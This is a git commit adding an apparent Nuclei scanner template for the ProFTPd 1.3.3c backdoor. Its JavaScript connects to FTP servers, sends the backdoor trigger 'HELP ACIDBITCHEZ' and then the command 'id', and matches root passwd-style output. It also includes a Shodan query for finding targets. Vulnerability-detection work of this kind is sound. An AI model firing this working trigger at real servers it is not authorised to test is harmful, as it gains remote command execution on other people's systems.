ProFTPd-1.3.3c - Backdoor Command Execution

2024-06-03 20:27:48 +05:30 · 2024-06-03 20:27:48 +05:30 · b6fd10317c
parent 10e92b1204
commit b6fd10317c
1 changed files with 47 additions and 0 deletions
--- a/javascript/backdoor/proftpd-backdoor.yaml
+++ b/javascript/backdoor/proftpd-backdoor.yaml
@ -0,0 +1,47 @@
+id: proftpd-backdoor
+
+info:
+  name: ProFTPd-1.3.3c - Backdoor Command Execution
+  author: pussycat0x
+  severity: critical
+  description: |
+    This backdoor was present in the proftpd-1.3.3c.
+  reference:
+    - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
+    - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
+  metadata:
+    shodan-query: product:"ProFTPD"
+  tags: js,network,proftpd,ftp,backdoor
+
+javascript:
+  - code: |
+      const data = ["HELP ACIDBITCHEZ\n", "id"];
+      const c = require("nuclei/net");
+      let conn = c.Open('tcp', `${Host}:${Port}`);
+      let resp = conn.RecvFullString();
+      if (resp.includes("ProFTPD 1.3.3c"))
+      {
+        for (let i = 0; i < data.length; i++)
+          {
+          conn.Send(data[i]);
+          console.log('Sending:', data[i]);
+          let resp = conn.RecvFullString();
+          resp
+      }
+        } else
+        {
+      exit();
+        }
+
+    args:
+      Host: "{{Host}}"
+      Port: 21
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"